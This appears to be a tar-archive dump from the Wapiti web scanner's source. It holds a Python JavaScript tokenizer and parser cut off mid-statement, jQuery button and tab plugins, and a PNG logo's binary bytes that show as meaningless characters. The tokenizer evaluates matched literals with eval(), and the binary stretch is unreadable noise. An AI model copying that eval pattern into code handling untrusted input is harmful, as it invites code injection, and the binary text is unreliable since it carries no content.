'SETTER', 54: 'GROUP', 55: 'LIST', 56: 'IDENTIFIER', 57: 'NUMBER', 58: 'STRING', 59: 'REGEXP', 60: 'break', 61: 'case', 62: 'catch', 63: 'const', 64: 'continue', 65: 'debugger', 66: 'default', 67: 'delete', 68: 'do', 69: 'else', 70: 'enum', 71: 'false', 72: 'finally', 73: 'for', 74: 'function', 75: 'if', 76: 'in', 77: 'instanceof', 78: 'new', 79: 'null', 80: 'return', 81: 'switch', 82: 'this', 83: 'throw', 84: 'true', 85: 'try', 86: 'typeof', 87: 'var', 88: 'void', 89: 'while', 90: 'with', 'UNARY_PLUS': 31, 'ARRAY_INIT': 49, 'instanceof': 77, '--': 34, 'try': 85, 'this': 82, 'UNARY_MINUS': 32, '|': 10, 'INDEX': 48, 'GROUP': 54, 'NEW_WITH_ARGS': 47, 'LABEL': 44, 'BLOCK': 43, 'SETTER': 53, 'const': 63, 'for': 73, '+': 24, '/': 27, 'case': 61, 'continue': 64, 'new': 78, ';': 2, '?': 5, 'END': 0, 'enum': 70, 'GETTER': 52, '&&': 9, 'REGEXP': 59, '[': 36, 'throw': 83, '!==': 16, '++': 33, 'SCRIPT': 42, '(': 40, '{': 38, 'delete': 67, '*': 26, '>=': 19, '>>': 22, '\n': 1, ',': 3, '!=': 14, 'debugger': 65, '&': 12, 'CONDITIONAL': 7, 'finally': 72, '.': 35, 'var': 87, ':': 6, '>': 20, 'function': 74, 'with': 90, 'else': 69, '>>>': 23, 'catch': 62, 'true': 84, '^': 11, '===': 15, '||': 8, 'IDENTIFIER': 56, 'default': 66, 'LIST': 55, '<': 17, 'while': 89, 'typeof': 86, '~': 30, 'false': 71, 'do': 68, '<<': 21, '<=': 18, 'NUMBER': 57, 'in': 76, 'return': 80, 'null': 79, 'if': 75, '!': 29, 'FOR_IN': 45, '%': 28, ')': 41, '-': 25, '==': 13, '=': 4, 'void': 88, 'STRING': 58, ']': 37, 'break': 60, 'PROPERTY_INIT': 51, 'switch': 81, 'CALL': 46, 'OBJECT_INIT': 50, '}': 39} keywords = {'false': 71, 'debugger': 65, 'in': 76, 'null': 79, 'if': 75, 'const': 63, 'for': 73, 'with': 90, 'while': 89, 'finally': 72, 'var': 87, 'new': 78, 'function': 74, 'do': 68, 'return': 80, 'void': 88, 'enum': 70, 'else': 69, 'break': 60, 'catch': 62, 'instanceof': 77, 'true': 84, 'throw': 83, 'case': 61, 'default': 66, 'try': 85, 'this': 82, 'switch': 81, 'continue': 64, 'typeof': 86, 'delete': 67} assignOps = {0: '|', 1: '^', 2: '&', 3: '<<', 4: '>>', 5: '>>>', '>>': 22, 7: '-', 8: '*', 9: '/', '<<': 21, '%': 28, 6: '+', '&': 12, '+': 24, '*': 26, '-': 25, '/': 27, '>>>': 23, 10: '%', '^': 11, '|': 10} opRegExp = re.compile(r"^;|^,|^\?|^:|^\|\||^\&\&|^\||^\^|^\&|^===|^==|^=|^!==|^!=|^<<|^<=|^<|^>>>|^>>|^>=|^>|^\+\+|^\-\-|^\+|^\-|^\*|^\/|^%|^!|^~|^\.|^\[|^\]|^\{|^\}|^\(|^\)") # A regexp to match floating point literals (but not integer literals). fpRegExp = re.compile(r'^\d+\.\d*(?:[eE][-+]?\d+)?|^\d+(?:\.\d*)?[eE][-+]?\d+|^\.\d+(?:[eE][-+]?\d+)?') # A regexp to match regexp literals. reRegExp = re.compile(r'^\/((?:\\.|\[(?:\\.|[^\]])*\]|[^\/])+)\/([gimy]*)') class SyntaxError_(ParseError): def __init__(self, message, filename, lineno): ParseError.__init__(self, "Syntax error: %s\n%s:%s" % (message, filename, lineno)) class Tokenizer(object): def __init__(self, s, f, l): self.cursor = 0 self.source = str(s) self.tokens = {} self.tokenIndex = 0 self.lookahead = 0 self.scanNewlines = False self.scanOperand = True self.filename = f self.lineno = l input_ = property(lambda self: self.source[self.cursor:]) done = property(lambda self: self.peek() == GLOBALS['END']) token = property(lambda self: self.tokens.get(self.tokenIndex)) def match(self, tt): return self.get() == tt or self.unget() def mustMatch(self, tt): if not self.match(tt): raise self.newSyntaxError("Missing " + tokens.get(tt).lower()) return self.token def peek(self): if self.lookahead: next = self.tokens.get((self.tokenIndex + self.lookahead) & 3) if self.scanNewlines and (getattr(next, "lineno", None) != getattr(self, "lineno", None)): tt = GLOBALS['NEWLINE'] else: tt = getattr(next, "type_", None) else: tt = self.get() self.unget() return tt def peekOnSameLine(self): self.scanNewlines = True tt = self.peek() self.scanNewlines = False return tt def get(self): while self.lookahead: self.lookahead -= 1 self.tokenIndex = (self.tokenIndex + 1) & 3 token = self.tokens.get(self.tokenIndex) if getattr(token, "type_", None) != GLOBALS['NEWLINE'] or self.scanNewlines: return getattr(token, "type_", None) while True: input__ = self.input_ if self.scanNewlines: match = re.match(r'^[ \t]+', input__) else: match = re.match(r'^\s+', input__) if match: spaces = match.group(0) self.cursor += len(spaces) newlines = re.findall(r'\n', spaces) if newlines: self.lineno += len(newlines) input__ = self.input_ match = re.match(r'^\/(?:\*(?:.|\n)*?\*\/|\/.*)', input__) if not match: break comment = match.group(0) self.cursor += len(comment) newlines = re.findall(r'\n', comment) if newlines: self.lineno += len(newlines) self.tokenIndex = (self.tokenIndex + 1) & 3 token = self.tokens.get(self.tokenIndex) if not token: token = Object() self.tokens[self.tokenIndex] = token if not input__: token.type_ = GLOBALS['END'] return GLOBALS['END'] def matchInput(): match = fpRegExp.match(input__) if match: token.type_ = GLOBALS['NUMBER'] token.value = float(match.group(0)) return match.group(0) match = re.match(r'^0[xX][\da-fA-F]+|^0[0-7]*|^\d+', input__) if match: token.type_ = GLOBALS['NUMBER'] token.value = eval(match.group(0)) return match.group(0) match = re.match(r'^[$_\w]+', input__) # FIXME no ES3 unicode if match: id_ = match.group(0) token.type_ = keywords.get(id_, GLOBALS['IDENTIFIER']) token.value = id_ return match.group(0) match = re.match(r'^"(?:\\.|[^"])*"|^\'(?:\\.|[^\'])*\'', input__) if match: token.type_ = GLOBALS['STRING'] token.value = eval(match.group(0)) return match.group(0) if self.scanOperand: match = reRegExp.match(input__) if match: token.type_ = GLOBALS['REGEXP'] token.value = {"regexp": match.group(1), "modifiers": match.group(2)} return match.group(0) match = opRegExp.match(input__) if match: op = match.group(0) if op in assignOps and input__[len(op)] == '=': token.type_ = GLOBALS['ASSIGN'] token.assignOp = GLOBALS[opTypeNames[op]] token.value = op return match.group(0) + "=" token.type_ = GLOBALS[opTypeNames[op]] if self.scanOperand and (token.type_ in (GLOBALS['PLUS'], GLOBALS['MINUS'])): token.type_ += GLOBALS['UNARY_PLUS'] - GLOBALS['PLUS'] token.assignOp = None token.value = op return match.group(0) if self.scanNewlines: match = re.match(r'^\n', input__) if match: token.type_ = GLOBALS['NEWLINE'] return match.group(0) raise self.newSyntaxError("Illegal token") token.start = self.cursor self.cursor += len(matchInput()) token.end = self.cursor token.lineno = self.lineno return getattr(token, "type_", None) def unget(self): self.lookahead += 1 if self.lookahead == 4: raise "PANIC: too much lookahead!" self.tokenIndex = (self.tokenIndex - 1) & 3 def newSyntaxError(self, m): return SyntaxError_(m, self.filename, self.lineno) class CompilerContext(object): def __init__(self, inFunction): self.inFunction = inFunction self.stmtStack = [] self.funDecls = [] self.varDecls = [] self.bracketLevel = 0 self.curlyLevel = 0 self.parenLevel = 0 self.hookLevel = 0 self.ecmaStrictMode = False self.inForLoopInit = False def Script(t, x): n = Statements(t, x) n.type_ = GLOBALS['SCRIPT'] n.funDecls = x.funDecls n.varDecls = x.varDecls return n class Node(list): def __init__(self, t, type_=None, args=[]): list.__init__(self) token = t.token if token: if type_: self.type_ = type_ else: self.type_ = getattr(token, "type_", None) self.value = token.value self.lineno = token.lineno self.start = token.start self.end = token.end else: self.type_ = type_ self.lineno = t.lineno self.tokenizer = t for arg in args: self.append(arg) type = property(lambda self: tokenstr(self.type_)) # Always use push to add operands to an expression, to update start and end. def append(self, kid, numbers=[]): if kid: if hasattr(self, "start") and kid.start < self.start: self.start = kid.start if hasattr(self, "end") and self.end < kid.end: self.end = kid.end return list.append(self, kid) indentLevel = 0 def __str__(self): a = list((str(i), v) for i, v in enumerate(self)) for attr in dir(self): if attr[0] == "_": continue elif attr == "tokenizer": a.append((attr, "[object Object]")) elif attr in ("append", "count", "extend", "getSource", "index", "insert", "pop", "remove", "reverse", "sort", "type_", "target", "filename", "indentLevel", "type"): continue else: a.append((attr, getattr(self, attr))) if len(self): a.append(("length", len(self))) a.sort(lambda a, b: cmp(a[0], b[0])) INDENTATION = " " Node.indentLevel += 1 n = Node.indentLevel s = "{\n%stype: %s" % ((INDENTATION * n), tokenstr(self.type_)) for i, value in a: s += ",\n%s%s: " % ((INDENTATION * n), i) if i == "value" and self.type_ == GLOBALS['REGEXP']: s += "/%s/%s" % (value["regexp"], value["modifiers"]) elif value is None: s += "null" elif value is False: s += "false" elif value is True: s += "true" elif type(value) == list: s += ','.join((str(x) for x in value)) else: s += str(value) Node.indentLevel -= 1 n = Node.indentLevel s += "\n%s}" % (INDENTATION * n) return s __repr__ = __str__ def getSource(self): if getattr(self, "start", None) is not None: if getattr(self, "end", None) is not None: return self.tokenizer.source[self.start:self.end] return self.tokenizer.source[self.start:] if getattr(self, "end", None) is not None: return self.tokenizer.source[:self.end] return self.tokenizer.source[:] filename = property(lambda self: self.tokenizer.filename) def __nonzero__(self): return True # Statement stack and nested statement handler. def nest(t, x, node, func, end=None): x.stmtStack.append(node) n = func(t, x) x.stmtStack.pop() if end: t.mustMatch(end) return n def tokenstr(tt): t = tokens[tt] if re.match(r'^\W', t): return opTypeNames[t] return t.upper() def Statements(t, x): n = Node(t, GLOBALS['BLOCK']) x.stmtStack.append(n) while not t.done and t.peek() != GLOBALS['RIGHT_CURLY']: n.append(Statement(t, x)) x.stmtStack.pop() return n def Block(t, x): t.mustMatch(GLOBALS['LEFT_CURLY']) n = Statements(t, x) t.mustMatch(GLOBALS['RIGHT_CURLY']) return n DECLARED_FORM = 0 EXPRESSED_FORM = 1 STATEMENT_FORM = 2 def Statement(t, x): tt = t.get() # Cases for statements ending in a right curly return early, avoiding the # common semicolon insertion magic after this switch. if tt == GLOBALS['FUNCTION']: if len(x.stmtStack) > 1: type_ = STATEMENT_FORM else: type_ = DECLARED_FORM return FunctionDefinition(t, x, True, type_) elif tt == GLOBALS['LEFT_CURLY']: n = Statements(t, x) t.mustMatch(GLOBALS['RIGHT_CURLY']) return n elif tt == GLOBALS['IF']: n = Node(t) n.condition = ParenExpression(t, x) x.stmtStack.append(n) n.thenPart = Statement(t, x) if t.match(GLOBALS['ELSE']): n.elsePart = Statement(t, x) else: n.elsePart = None x.stmtStack.pop() return n elif tt == GLOBALS['SWITCH']: n = Node(t) t.mustMatch(GLOBALS['LEFT_PAREN']) n.discriminant = Expression(t, x) t.mustMatch(GLOBALS['RIGHT_PAREN']) n.cases = [] n.defaultIndex = -1 x.stmtStack.append(n) t.mustMatch(GLOBALS['LEFT_CURLY']) while True: tt = t.get() if tt == GLOBALS['RIGHT_CURLY']: break if tt in (GLOBALS['DEFAULT'], GLOBALS['CASE']): if tt == GLOBALS['DEFAULT'] and n.defaultIndex >= 0: raise t.newSyntaxError("More than one switch default") n2 = Node(t) if tt == GLOBALS['DEFAULT']: n.defaultIndex = len(n.cases) else: n2.caseLabel = Expression(t, x, GLOBALS['COLON']) else: raise t.newSyntaxError("Invalid switch case") t.mustMatch(GLOBALS['COLON']) n2.statements = Node(t, GLOBALS['BLOCK']) while True: tt = t.peek() if(tt == GLOBALS['CASE'] or tt == GLOBALS['DEFAULT'] or tt == GLOBALS['RIGHT_CURLY']): break n2.statements.append(Statement(t, x)) n.cases.append(n2) x.stmtStack.pop() return n elif tt == GLOBALS['FOR']: n = Node(t) n2 = None n.isLoop = True t.mustMatch(GLOBALS['LEFT_PAREN']) tt = t.peek() if tt != GLOBALS['SEMICOLON']: x.inForLoopInit = True if tt == GLOBALS['VAR'] or tt == GLOBALS['CONST']: t.get() n2 = Variables(t, x) else: n2 = Expression(t, x) x.inForLoopInit = False if n2 and t.match(GLOBALS['IN']): n.type_ = GLOBALS['FOR_IN'] if n2.type_ == GLOBALS['VAR']: if len(n2) != 1: raise SyntaxError("Invalid for..in left-hand side", t.filename, n2.lineno) # NB: n2[0].type_ == INDENTIFIER and n2[0].value == n2[0].name n.iterator = n2[0] n.varDecl = n2 else: n.iterator = n2 n.varDecl = None n.object = Expression(t, x) else: if n2: n.setup = n2 else: n.setup = None t.mustMatch(GLOBALS['SEMICOLON']) if t.peek() == GLOBALS['SEMICOLON']: n.condition = None else: n.condition = Expression(t, x) t.mustMatch(GLOBALS['SEMICOLON']) if t.peek() == GLOBALS['RIGHT_PAREN']: n.update = None else: n.update = Expression(t, x) t.mustMatch(GLOBALS['RIGHT_PAREN']) n.body = nest(t, x, n, Statement) return n elif tt == GLOBALS['WHILE']: n = Node(t) n.isLoop = True n.condition = ParenExpression(t, x) n.body = nest(t, x, n, Statement) return n elif tt == GLOBALS['DO']: n = Node(t) n.isLoop = True n.body = nest(t, x, n, Statement, GLOBALS['WHILE']) n.condition = ParenExpression(t, x) if not x.ecmaStrictMode: #

Summary

Category Number of vulnerabilities found
Wapiti © Nicolas SURRIBAS 2006-2013
wapiti-2.3.0+dfsg/wapitiCore/report_template/js/000077500000000000000000000000001240201516300216525ustar00rootroot00000000000000wapiti-2.3.0+dfsg/wapitiCore/report_template/js/kube.buttons.js000077500000000000000000000044621240201516300246440ustar00rootroot00000000000000/* kube.buttons.js v1.0.1 Copyright 2013 Imperavi, Inc. */ !function ($) { "use strict"; // Plugin $.fn.buttons = function(option) { return this.each(function() { var $obj = $(this); var data = $obj.data('buttons'); if (!data) { $obj.data('buttons', (data = new Buttons(this, option))); } }); }; // Initialization var Buttons = function(element, options) { // Element this.$el = $(element); // Options this.opts = $.extend({ target: false, type: false }, options, this.$el.data()); // Init this.init(); }; // Functionality Buttons.prototype = { // Initialization init: function() { if (this.opts.type === 'toggle') this.buttons = this.$el; else this.buttons = this.$el.find('.btn'); if (this.opts.type === 'segmented') this.value = $(this.opts.target).val().split(','); else this.value = $(this.opts.target).val(); this.buttons.each($.proxy(function(i,s) { var $s = $(s); if (this.opts.type === 'segmented' && $.inArray($s.val(), this.value) !== -1) { this.active($s); } else { if (this.opts.type === 'toggle' && this.value === 1) this.active($s); else if (this.value === $s.val()) this.active($s); } $s.click($.proxy(function(e) { e.preventDefault(); if (this.opts.type === 'segmented') { this.value = $(this.opts.target).val().split(','); if (!$s.hasClass('btn-active')) { this.active($s); this.value.push($(s).val()); } else { this.inactive($s); this.value.splice(this.value.indexOf($s.val()), 1); } $(this.opts.target).val(this.value.join(',').replace(/^,/, '')); } else if (this.opts.type === 'toggle') { if ($s.hasClass('btn-active')) { this.inactive($s); $(this.opts.target).val(0); } else { this.active($s); $(this.opts.target).val(1); } } else { this.inactive(this.buttons); this.active($s); $(this.opts.target).val($s.val()); } }, this)); }, this)); }, active: function($el) { $el.addClass('btn-active'); }, inactive: function($el) { $el.removeClass('btn-active'); }, }; $(function() { $('[data-toggle="buttons"]').buttons(); }); }(window.jQuery);wapiti-2.3.0+dfsg/wapitiCore/report_template/js/kube.tabs.js000077500000000000000000000034451240201516300240770ustar00rootroot00000000000000/* kube.tabs.js v1.0.1 Copyright 2013 Imperavi, Inc. */ !function ($) { "use strict"; // Plugin $.fn.tabs = function(option) { return this.each(function() { var $obj = $(this); var data = $obj.data('tabs'); if (!data) { $obj.data('tabs', (data = new Tabs(this, option))); } }); }; // Initialization var Tabs = function(element, options) { // Element this.$el = $(element); // Options this.opts = $.extend({ height: false, active: false }, options, this.$el.data()); // Init this.init(); }; // Functionality Tabs.prototype = { // Initialization init: function() { this.links = this.$el.find('a'); this.tabs = []; this.links.each($.proxy(function(i,s) { var hash = $(s).attr('href'); this.tabs.push(hash); if (!$(s).hasClass('active')) $(hash).hide(); // option active if (this.opts.active !== false && this.opts.active === hash) { this.show(s, hash); } $(s).click($.proxy(function(e) { e.preventDefault(); this.show(s, hash); }, this)); }, this)); // option equal if (this.opts.height === 'equal') { this.setMaxHeight(this.getMaxHeight()); } }, active: function(tab) { this.links.removeClass('active'); $(tab).addClass('active'); }, show: function(tab, hash) { this.hide(); $(hash).show(); this.active(tab); }, hide: function() { $.each(this.tabs, function() { $(this).hide(); }); }, setMaxHeight: function(height) { $.each(this.tabs, function() { $(this).css('min-height', height + 'px'); }); }, getMaxHeight: function() { return Math.max.apply(null, $(this.tabs).map(function() { return $(this).height(); }).get()); } }; $(function() { $('nav[data-toggle="tabs"]').tabs(); }); }(window.jQuery);wapiti-2.3.0+dfsg/wapitiCore/report_template/logo_clear.png000066400000000000000000001277421240201516300240670ustar00rootroot00000000000000PNG  IHDRL& 'bKGD pHYs筯tIME  ,' IDATx]g3DEI 1"b@ s|>bΘsŀPT@@ DP$IV$z2pZ'"( A@@@@@ @ 2d A@@@@@ @ 2d A@@@@@ @ 2d A@@@@@ @ 2d A@@@@@ @ 2HCU|1CD慳 `ތLU_p (`MAAQQQ8 Alvw."# Xb "7y/j8WzT8[ l`!"wLVk=Z_Df8*  `-pI#{8B|v2X=EZϯ}B?"R3 C$*zH}=FU 4mRU?UdTFn=#j2xXOUo0SUou>u0@x#OOqS"+ bH^`"k4_Uu,2/=?!OKq(?ƼvqB ʗ Th< qdɱgwCg{?ٮnc_6\@:ZU  @,g~+Tu>'8*W9 A@@n .>Cl._@D ݉ZXV!:UU 9 A@@v_'dXDBiqD7,zEkc#|] ;~3W|'L;Ye1Fȸ}q\.nHD&9 A@@vY.m*"WZDȔd;lg, 9 A@@~`.[}HD @WyXDDd8,+ ګjS>ղjx -Tup$d:8GU `~<Ű6Ȗ;5LUky\E js;x4g'h+"P}M c?1ȷW; A@Y'U0/|P3̱0\_Y:})b# 2"h +VW8p)+CPU'꽪G _vd ^g#$2h 0PY,RպdTXW&8֋(V©HcT.oWYKa?TGʾI}GnwU=0nB;j<cwjrY#i7{}im3e0MDwm!"hJdiW;aFIv,[I_bcb^8c]D fz&E>srG ^R B^mUOTLEd{X6X޾&>MUވ W.Ɏ@Q2[U[e\,(;GC2ۇol 6%@qTDn&~~PK^Dbh `7Z4Z5w<,/зC|+ Uhdg ,+!הV}@ lW9@W0B>TuCExV<ѺK,tQ 7G]=u dZGOP3 hw?Nq 5$ A@B gqt0TU{jD:Xz (XFR_x"r&,u 6`>@Ʃ=1?"^se߼H/XhW@UM[9 6kyL#\y$G4?y-~V ,Ĵ#bb20L*d  0!j DU=)U}O5Uu"]Dn4,"aO< ᎔"ﯢV \<-sssj"SKG&X@>Q@ "rl^۪z+= qo%z2]Z?rMUu _d\$Tu=g geg\RD+ˠ _#/{ր/`7+"䄨e@8r;X ʂQ,-}Xˊf>pAd2/lW_UmT_ uvB0'{fKȠ Fn+ 슚X"=U"2;a?zqE@څ 4.}#a~V"ҋi]a F^`i`R"!(qD>hbm3ËbJ"QY%$7s-B50@eA G, Vc߾1ze){6,stS`7GUβ1d[`BP2L"hD qǙDhR׏pCEtX4m=By,|ĎYF7r ݩ5̜9oPmQ<ȑAx?V1@U4dF^jh&Xm@eFE;7f:⻿5[FU("3am=>(F yoB v5: 3Hp0{^%XgZ'w2dP.p' nJBkpl|-XVPR|'uuOj 5KTm`Z4K<2-6lp{So@8k:T ܀@AO4.ersESto V,V"-<2P_t y7ɀn#7,7oL8l;-oV| "Q Y pzŇ-' hCe -Ϸ9̏(l YMi+ {1 ݅,-?r!Mb>Nim$zek* AZDx%~!\P В* 힫2h`I (^}oXDTeI}Lbr!UOIs |\ s)ɢӗ@XKzr)HWOBUk"dۛ\G.YUM"dk~`wi {χcն_0ho.SSjD K; A@>^"DA5 y8,l)g"JNjpHk5=Ay a4iWwu2E$g`js^ Dzע3sYQKEx\@ ښm_M E T /Gނ zCU,! -Ԛ,"Xv2Hy ~.Uڶ4oPܟ?$ŵjckBrZÐ@ :h@k 4VG`?HU7!M P[/ ~M F8} 3 iUm jy."D u>-G\D"'XR\WC^99,s7r9_2ppQ. dKTխUhU=V=`AQ|T.k?um#%n'Q lYA oQ[._)-6lqχ52K 5Ogq$ΒhL%DM>($Ϫڣ#Hd2`4Nc'jz-ۏ.Yy^Dg6(G>@UmỖ'ed|7HyϽc) L k{eOM8GIhsra]zF< dɿa)w%P0(9 uɦ$<y,fy`1즏g) 9lEuy,f>x}t!"8lb X_w>As݌: X-9/p)T 좪_Pm0' ]7k ݽ(ʭz)e(x}rADF74;-v$9b$#7MH Ex *'2>E61`'1-y)l@-V* Qշ`=JְT$a6{9[փ+4|ޑkeDZiR}W>%p 5G)nY]5A462FD2Z^{JU*a'`5'ojY4|=TIep@@U} =v{~e,u@5U: K=~,|_ Ģe 2rlsED]DoG^sO\VRd"rYnI#Je܎'$1` $Y K,&liO Y* s?ի4x [V rCU=@?;yX5k`ZFs"s< NE ֋@UUU;?\Nkm`sV#)q9,h}E>e-ȖSa.WgU4 V"+rõp,H "[/r!zM0yy&MGj+ HU/}lteKkE^>/czbIx0ḢAȺ.ѰV<"rWn~!a"t<i7(6"umXy'#:b1""Sv6,ǥX) XȀ872v`XʡA/qʖp $ea,@[4RDd p{{SaMԾRշ|71{hsCW/p["Wht`UaijŹ@)9½_xOq,7z!Z XȀ> Ћ3N˺7Ԉfx8eBTuv;WJe,@Um[UۈHo ,᧟VqMRZ "koˉ0ZU_Q^n mɠ{JGs.O ec>ivQ!|P-I!ri eS7zQ8%&vڛ¥naq kcUEcZDdW뭪ڒFwp ⛭-߄j?U=?x7ϭ|"aMDd#9olH $w)k<d 7Q+X}EI7!;nvjNuUmf{^U?H`#U}.#!EHG\=&k>w6;|Q~~];,1!1"hX 鷰%:FUD9,D깈TF˔u 2(dA"riMX3GuDԀՕ x|wG{P:|JmiIT&/FgoKa4=˺wMU?UՏV ׊{!%{z*/E㔮"FFU@UQUOEre#mOV,Y T"U&!z87QkKp `+չ'M!d ".0R.m[ijx3I K21 tK Lw` KX3RQ:x 4U]r x6撼UUV|ˠ#]|%WD@UJUc/ pi,XU4ds6k$ue.Ϫzn-y^sMxf+j XȀ J/T5vo3.)V]U a-#Zȃ)za(,5:0 OSȏ&a30nL`1 X1ؠ'e\EwҠL{"wqi~xnyoY`2_Y*ޫPkM%nI%6b:Ad@OC45L{SYSI`KUVͿVڴSf$ CϦ?">ן;86y ."u ,Е(>gGn^ыvSս#.)"2G|蟲"2J\[J^Q-,@! ȏPVm}6ƪ4,*`;'`靵ig7aj ^El)"E2{sȱD)2iQtvw~U=".ĪcZX^Dȩ>k0XS̷(cT/Å5}\w+Mq7Ij>ɰ BbvҚN:{^kP"2a_!,"#GOm* Xv=?SVge'X!tH8cߊL;,eqS`qڇ,:|2hXV>tX= UnXˍ%(wYso \z;}|tu&<#~yEgx#p>~Xsl_@W =Ws>w3l '49{0+P<8 1peX}dZ'D'n>% w[SL[(y(&"o>_Q,u*hoCiOX<+^] QLBU2(`n"k %"/p>,Sa|MGZGp?q4KHD_97ɢ_?cRԊZ$T^csIiȿ%0[@U$Y> Ca=N \ $Йv*p8xݑ _r+fkX&c.}# MXv͡~O(F:]E~Y,O8W`^V,t:, t9AMy๜~ÃVE IDATjJPԀ)Df$( 'h1YZDt^I6XUs簺ycXkzBzTJ ~UAdjpe*:a;Ր`\ż>QUtV;.7<D U=v.hݡ3+E#oorTuie҉VzEȠ֨qnP՗Eĵ>־e˞U fgV$.V4XMXz^ JXTz:m.zfM\N3QKש4!E%I;SCc\DbQknj4mˢjs5 6WV]roUhs %TXIOd죪H* `RQXU$|5 te@ynAkͽie|K\׷pZ\mdʑj uaq0GU6Jv`u\XNN'V3_VQ -J8 ya-Ӡ=z|n J@ ȵ:oʻ`*,aB*k|_DZ$`6 -`1sUl`n" Û `^6/~cm8-ɽ1 @c’ՏFW\Ѷ z&W%-kߡŴ w!P`U݃t'wBR`*X|zH'X["w`Kqo8fm !^Am͢\LzwSjj'5m75>fzuaԑԌbU$WI\%gKAM XLy\DK^c΢v?QEdU}wZ=O/9ܐ֤$9 RKuk>6yvցU7jCI{Z=ewTl5,^3]D$l⣴8ED^ dPv^Xj312QTX&ƨ] f~hk>< ֯a~Ǹh!BkW"R$wnHf.zOON/<'"Ŭ}afRGg7? Qʝ"X:3\PA?h.$x/Hخ)MCW%)lbQ9_M@kQyC80a{i_u ?|s.1v,P_KU=6UY*ge{GŇҝ61AZ7x%g<9I)n..&NG _7iA b+ݖ*.sp*LXfbY6Ƞ.01]&펁p\D-c*@f,aJKaCe~/n S(}i).nG²`ޢ+i,]ͰCm!"o~0k Ѱaa<%$ԬgȖNF|a"++u-ϢV6WY~A벹s{2ߛ Xf شϪ,-ӲT V U [|yW`NPݾ ,C}ee-jCX|n7y .u?M`1ׂs߇/"e2xOjxɾyZ;]/X]70TDaL?ȡ>!tF4XDZDTް>&ӂ[ToL~r&"ﯩuޜ\y,M ԂbfYX: rXmhLDgߚtivc UPU[N7X"(>kM}3nU:D0˿u(_wp6,lg*?wD^& 7Uv~8v,'0U@U@a8)w9VNW" kIef] Y2,z}phpk jw=`ڊȒpb-e$ZQG`TU=Y@GHo_`v|+`u²ʢ8l IgP_7:=m?YعPLܹgڲ\krŵ µc1E V_ &a7ogs:m#dUԵCҎ@[U)2n$PAAD_ +U}VgU.w*YZ IfzEVCb3jɧ9aLp5G~2]2peEGD\6g{@UjJdYW?&^eJB B6c3y#9\Χid06rkޘ{>{~9Mcafv`U0#_p׋wSD~Ke|{##i6e#]!1Gv-ҴZd1Z/X$H/j|'"RFЂPA-XRCmʏi}uҧy"`Tf*Ά Xv!vn|:,h<{2"rKR,h=VMe6jefς'-"+)L|>V<.zAbVz3587 ŧxLj QpCi,j}i߉Y㹏٣i8#Vw`U<8&n0ZX4(7.%rGY7x?w|jCrp5z$}׸w@ܸ79f 1<7k3V0=wV囟TN?MX䉥8/RŮSuU#W_7E֍=Q=x'"ϋ>0)=ƶ!I"gѵZOD:ȩ"#U<`s'J xjS[ؘ7qC%TTX }a:+as 7~m`xs)x^V[/)[X7`u it(E0#NwO{XF(ϥހ?Sӕt/Z;EYְ ~69vޱ5򆫼`'t)"_FXL1BOx;󭜁$7~IzڙXϘ\bq},.v6V͹6YǍdP {(qMX|e"";:meăY(Nw-)&KllVuǛwLnvp۳fiEH\yُz}PY5s6:}x+nCDFj[ZE6 I͠= ֛ҕՔ)'OҮ9JxʃGړ? Z"S, m|+"SIu.2NV{.}ra 16AP|@}"rYTKoU"wM<] sh=QF|<3ZuX{^!"Tus @D|A#e|`a[]u}"v!X3Fߪ ݯDa/WlEa6qdU,O.mNۜ.XQ̲Ud `f=Dd]F+q5a1H80 eFDsaXYu3EV&qvaex 8ѪyJIk~D ,\Gx GHX("jg.fXcKD~8ZQc=FQ 6to`Y'g}مaMDU ,YהUnu ;%F{|p PDe5!<%$9;2zòΤ4sCjS)ixgX@ /aGHq=;mtI Ok$M7t;2"'*2Hwrqf:y })"w,?Pr HP[A¹׻2t+ٮvZW"҉ 4i]#/DsֆOpˍ TmcT(^ZVLˢ:]pOv7|eYe_Xt 0x4,:Q$N@:%pKclJ7Z8%1Ԁ5[n ZsxF6< =U[RkPȀzSXα󴈜彿ωȽq>Dr_G#aR]D?LX6vq Vz϶cht7KuȕMd(tFRUDBɰN|6[#Q,V;qLWIF2uX։1n$hHݺPIͼ.| `爠Uū[uEr R6;6{DcSIfQot)3Qfm"ªxPL+g2h_ ]Ӽۃ"u-Nk7AEtl$1 3儙 w )&"$BfJ6Lf_1ޅ%wDWSkk :NQYL$ %X#>U ֺ{U{ DDNJ"px$5U+2uKLRk9rI~{E.aXSsWTJ/uUE'˕pc:6QKN97!_oKɬ=~ Z!yk`%]Y`ު44~)&+j_ztX@%:|Zl)Kݒqv(cȸ<0n7U{S\z^%iUM !*J/xc¶4o]W<7žFY'x-⿿o3[x`r]jH[t|'v!|X@ViX$X.)gb bl|o&5 poiIeA+IU8vaN%`dZԥsR…^ZhAbjvu 23Iuhì]D5q*:$ Ϳ򜽃iu钍fb]'^ԎwsUkX Sq|ZMtA<""#uGO6~Kyl7M U=_>5to ko]`]my0{-)j=RfQ@W{LY!ѹY `۟kB=.\+8|MUCacX+Z@Y#/a59$ݹ$t]U^[ tO5~}g+s0DX,.|Fd{XL#xn9,}۪z/lVvIjȠrb}Z҇f8#3k-pV]Q`\憨ނm!1] {+>븊bUG$]aS7Q+ ZbJ@XjfQ Ammף;2\CGGX1DD`Zeܮ,p Inc DSL8ºZAC[ӛ#2 _ .gR_8ˀcưk@G x~~0.tUݞHR6*JX {Rb4u^kB.*¸},\y"Z+I*m 85tl ˖9Bl6,h$]8ko Xj(sF^.׆a9E|< (fmM }9,!Z:c$=ij6$M"rcd_Iv`i'IQU"r; {,O2X 5~8J Z7. ShYϲ;D@UO(֡o_Xmv0YDfyHCNa{9`nWy"uW#3h ad9V4Nea$c ^'HF @ȤN yeYR*?0Ke4M:·\+DGӭ[Հ>3ؗ~ބMj]^Ḷ"rA+oWjٟI] IDATxJDét$w\@sBmX#e/5p(5sSoo|"k7RU%Yf$U}MUN fQEq,P@'_H!d,a xo7e̎Tq|!3Ft678F~IF"r' 'm hnM<<8OoXAYzGfc1¶)a76n("s`3רYs#?6$5t=d~%>[D6Aɦ%\=.MۮȤˠZ `6sb%)U=+m̫ɻODYuH ~+4vKuڔ}wjD^ˊaƗݰyz@94Q;1S6B}9g'@{Җ)DmVp< ӐaiXy*&j֚l=B|`jÂrkSUɿ] qh LtT$ 쨪0nrnb6"NDWEd5"FzD=,sjo`TG[l!"%A3n`w7s)K_"Xv"2]^)v a C\mi=6ӹqHIk!{OUҸӦ/@ߒSnc D/[Q̏WH)`ff9>Z2/r?oMͼ[RA?y$,ڔ74 2裪M30߬²OQC-c _ 